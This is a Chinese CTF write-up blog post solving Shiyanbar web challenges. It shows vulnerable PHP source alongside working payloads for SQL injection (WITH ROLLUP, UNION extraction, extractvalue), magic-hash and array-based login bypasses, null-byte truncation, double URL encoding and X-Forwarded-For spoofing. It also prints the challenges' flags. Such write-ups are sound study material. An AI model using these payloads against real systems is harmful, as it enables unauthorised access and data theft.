Chybeta

实验吧-web-writeup

实验吧-web-writeup(持续更新)

登陆一下好吗

payload:

1
username='=' &password=' = '

后端查询语句注入为:

1
select XXX from XXX where user = ' '=' ' AND pass = ' '=' '

得到flag:

1
ctf{51d1bf8fb65a8c2406513ee8f52283e7}

who are you?

考点:基于时间的盲注,insert注入
ip伪装技巧:

1
2
3
4
5
X-Forwarded-For
Client-IP
x-remote-IP
x-originating-IP
x-remote-addr

因缺思汀的绕过

查看源代码。注释中有:

1
source: source.txt

访问得到源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<?php
error_reporting(0);
if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
echo '<form action="" method="post">'."<br/>";
echo '<input name="uname" type="text"/>'."<br/>";
echo '<input name="pwd" type="text"/>'."<br/>";
echo '<input type="submit" />'."<br/>";
echo '</form>'."<br/>";
echo '<!--source: source.txt-->'."<br/>";
die;
}
function AttackFilter($StrKey,$StrValue,$ArrReq){
if (is_array($StrValue)){
$StrValue=implode($StrValue);
}
if (preg_match("/".$ArrReq."/is",$StrValue)==1){
print "水可载舟,亦可赛艇!";
exit();
}
}
$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){
AttackFilter($key,$value,$filter);
}
$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql);
if (mysql_num_rows($query) == 1) {
$key = mysql_fetch_array($query);
if($key['pwd'] == $_POST['pwd']) {
print "CTF{XXXXXX}";
}else{
print "亦可赛艇!";
}
}else{
print "一颗赛艇!";
}
mysql_close($con);
?>

用到mysql中的with rollup技巧。用普通的select查询下;

1
2
3
4
5
6
7
mysql> SELECT uname,pass FROM test.table;
+---------+------+
| uname | pass |
+---------+------+
| chybeta | 123 |
+---------+------+
1 row in set (0.00 sec)

在加上group by pass with rollup

1
2
3
4
5
6
7
8
mysql> SELECT uname,pass FROM test.table group by pass with rollup;
+---------+------+
| uname | pass |
+---------+------+
| chybeta | 123 |
| chybeta | NULL |
+---------+------+
2 rows in set (0.01 sec)

rollup在查询结果中加上了一行,并且pass字段的值为NULL。这样当我们post进的pwd的值为空,就能满足$key['pwd'] == $_POST['pwd']的条件了。

在此之前我们还有一个条件要满足mysql_num_rows($query) == 1,我们要选择pass为NULL的单独的这一条记录。从源码分析可得,过滤了逗号,我们不能简单的使用limit 1,1这样的语法,而是可以使用limit 1 offset 1。就本地环境而言,比如

1
2
3
4
5
6
7
mysql> SELECT uname,pass FROM test.table group by pass with rollup limit 1 offset 1;
+---------+------+
| uname | pass |
+---------+------+
| chybeta | NULL |
+---------+------+
1 row in set (0.01 sec)

最后构造出的payload如下:

1
uname=' or 1=1 group by pwd with rollup limit 1 offset 2 #&pwd=

之所以为offset为2,是因为rollup是在查询结果最后加上一行,而我们通过or 1=1查询出来的不知道有多少行,所以这个2是fuzz出来的。

最后flag:

1
CTF{with_rollup_interesting}

简单的sql注入

1
http://ctf5.shiyanbar.com/423/web/

Once More

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
if (isset ($_GET['password'])) {
if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
{
echo '<p>You password must be alphanumeric</p>';
}
else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
{
if (strpos ($_GET['password'], '*-*') !== FALSE)
{
die('Flag: ' . $flag);
}
else
{
echo('<p>*-* have not been found</p>');
}
}
else
{
echo '<p>Invalid password</p>';
}
}
?>

第一层判断通过ereg,要求只能出现字母和数字,但ereg有缺陷,可以用%00绕过。第二层判断要求位数少但要大于9999999,可以利用科学计数法。最里层要求出现*-*,用%00后面再加上即可。
payload:

1
2
http://ctf5.shiyanbar.com/web/more.php
?password=9e9%00*-*

flag:

1
CTF{Ch3ck_anD_Ch3ck}

Guess Next Session

1
http://ctf5.shiyanbar.com/web/Session.php

给了源代码

1
2
3
4
5
6
7
8
9
10
11
12
<?php
session_start();
if (isset ($_GET['password'])) {
if ($_GET['password'] == $_SESSION['password'])
die ('Flag: '.$flag);
else
print '<p>Wrong guess.</p>';
}
mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));
?>

预测是个幌子。session_start()

基于PHPSESSID=oso27id67fqu8hbvq57bacahn3作为身份认证信息,所以我们随便在PHPSESSID中加几个字母,这时服务器端的$_SESSION['password']为空,然后我们的password再置为空,

然后就得到了flag:

FALSE

1
http://ctf5.shiyanbar.com/web/false.php

给了源码:

1
2
3
4
5
6
7
8
9
10
11
12
<?php
if (isset($_GET['name']) and isset($_GET['password'])) {
if ($_GET['name'] == $_GET['password'])
echo '<p>Your password can not be your name!</p>';
else if (sha1($_GET['name']) === sha1($_GET['password']))
die('Flag: '.$flag);
else
echo '<p>Invalid password.</p>';
}
else{
echo '<p>Login first!</p>';
?>

输入的name和password不能一样,之后的sha1比较用了===,不存在弱类型问题。但sha1不能处理数组,当我们传入name[]=1&password[]=2时,会造成sha1(Array) === sha1(Array),即NULL===NULL,从而吐出flag。本地测试如下:

1
2
3
4
<?php
$name = $_GET['name'];
var_dump(@sha1($name));
?>

payload:

1
http://ctf5.shiyanbar.com/web/false.php?name[]=1&password[]=2

上传绕过

上传路径截断。

  1. burp抓包,修改为 uploads/cap.php .jpg
  2. 转到hex编码,将空格20,改为00
  3. 发包。

1
flag{SimCTF_huachuan}

程序逻辑问题

1
http://ctf5.shiyanbar.com/web/5/index.php

访问后查看源代码,有个index.txt。得到源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
if($_POST[user] && $_POST[pass]) {
$conn = mysql_connect("********", "*****", "********");
mysql_select_db("phpformysql") or die("Could not select database");
if ($conn->connect_error) {
die("Connection failed: " . mysql_error($conn));
}
$user = $_POST[user];
$pass = md5($_POST[pass]);
$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
printf("Error: %s\n", mysql_error($conn));
exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
echo "<p>Logged in! Key:************** </p>";
}
else {
echo("<p>Log in failure!</p>");
}
}
?>

对$user没有过滤,尝试报错注入:

1
user='and extractvalue(1, concat(0x5c, (select pw from phpformysql.php limit 1)))#&pass=1

结果很尴尬:

1
welcome to simplexue Error: SELECT command denied to user 'web6lo'@'localhost' for table 'php'

好吧题目既然说是逻辑漏洞,接下来那就找咯。可以看到它的用户名和密码是分开判断的。并且用户名处存在注入。所以思路如下,我们给用户名传入:

1
user=' union select "0e830400451993494058024219903391"

构成的sql语句为:

1
select pw from php where user=' ' union select "0e830400451993494058024219903391"

第一个查询结果为空,所以结果返回的是我们传入的0e830400451993494058024219903391,即此时,$row[pw]=0e830400451993494058024219903391。而md5(QNKCDZO)正是该0e字符串值。

最后的payload:

1
user=' union select "0e830400451993494058024219903391"#&pass=QNKCDZO

得到flag:

1
SimCTF{youhaocongming}

what a fuck!这是什么鬼东西?

jsfuck。f12里控制台运行一下,得到flag:

1
Ihatejs

php大法好

访问

1
http://ctf5.shiyanbar.com/DUTCTF/index.php

得到提示:

1
Can you authenticate to this website? index.php.txt

访问,得到源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
if(eregi("hackerDJ",$_GET[id])) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
echo "<p>Access granted!</p>";
echo "<p>flag: *****************} </p>";
}
?>
<br><br>
Can you authenticate to this website?

二次解码。payload:

1
2
3
4
5
payload 1:
http://ctf5.shiyanbar.com/DUTCTF/index.php?id=%25%36%38%25%36%31%25%36%33%25%36%62%25%36%35%25%37%32%25%34%34%25%34%61
payload 2:
http://ctf5.shiyanbar.com/DUTCTF/index.php?id=%2568%2561%2563%256b%2565%2572%2544%254a

flag:

1
DUTCTF{PHP_is_the_best_program_language}

这个看起来有点难

经过fuzz,可以知道是整数型注入。

1
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,database()

得到表名。

1
http://ctf5.shiyanbar.com/8/index.php?id=1 UNION SELECT 1,GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()

得到列名

1
http://ctf5.shiyanbar.com/8/index.php?id=1 UNION SELECT 1,GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x746869736b6579

得到flag:

1
http://ctf5.shiyanbar.com/8/index.php?id=1 UNION SELECT 1,GROUP_CONCAT(k0y+SEPARATOR+0x3c62723e) FROM thiskey

flag:

1
whatiMyD91dump

貌似有点难

1
http://ctf5.shiyanbar.com/phpaudit/

题目提供了源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
$cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
$cip = $_SERVER["REMOTE_ADDR"];
else
$cip = "0.0.0.0";
return $cip;
}
$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误!你的IP不在访问列表之内!";
}
?>

抓包,添加X-Forwarded-For: 1.1.1.1

得到flag:

1
SimCTF{daima_shengji}

猫捉老鼠

1
#WWWnsf0cus_NET#

forbiden

题目说:Make sure you are in HongKong
抓包,修改:

1
Accept-Language: zh-hk

得到flag:

1
123JustUserAGent

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:实验吧-web-writeup

文章作者:chybeta

发布时间:2017年07月24日 - 21:07

最后更新:2017年08月16日 - 19:08

原始链接:http://chybeta.github.io/2017/07/24/实验吧-web-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。